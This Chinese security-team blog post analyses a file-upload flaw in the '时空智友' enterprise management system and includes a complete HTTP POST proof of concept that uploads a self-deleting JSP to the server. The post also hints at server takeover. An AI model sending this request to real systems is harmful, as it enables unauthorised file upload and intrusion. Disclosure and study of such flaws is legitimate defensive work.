免责声明
本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承担。请遵守中华人民共和国相关法律法规,切勿利用本公众号发布的技术或工具从事违法犯罪活动。最后,文中提及的图文若无意间导致了侵权问题,请在公众号后台私信联系作者,进行删除操作。
0x01 代码审计
针对已公开的漏洞,我目前尚未发现相关深入分析的文章。随后下载了该漏洞对应的源码,通过代码分析、配置检查等手段,对该漏洞进行深入挖掘和研究,以期能够揭示该漏洞的更多细节和技术原理。漏洞存在于com.artery.form.services.FormStudioUpdater中。
反编译jar包后查看com.artery.form.services.FormStudioUpdater类,可以成功看到调用方法的代码
在uploadStudioFile方法中,得知系统会从plugins.xml读取参数,然后反射调用,从plugins.xml中得知漏洞点触发位置在updater模块,对应的类在com.artery.form.services.FormStudioUpdater中,在调用过程中未实施有效的安全控制措施(如文件类型过滤器和内容验证机制),这可能导致潜在的安全风险。
0x02 poc
POST /formservice?service=updater.uploadStudioFile HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 1098Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipConnection: closecontent=<?xml%20version="1.0"?><root><filename>ceshi.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%48%65%6c%6c%6f%20%57%6f%72%6c%64%21%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%20%25%3e-->
至于获取服务器权限,能干啥不用我多说了吧。
0x03 加入我们
欢迎加入深潜sec安全交流群。后台回复”安全交流“,加入交流群。
原文始发于微信公众号(深潜sec安全团队):时空智友企业信息管理系统_文件上传漏洞分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论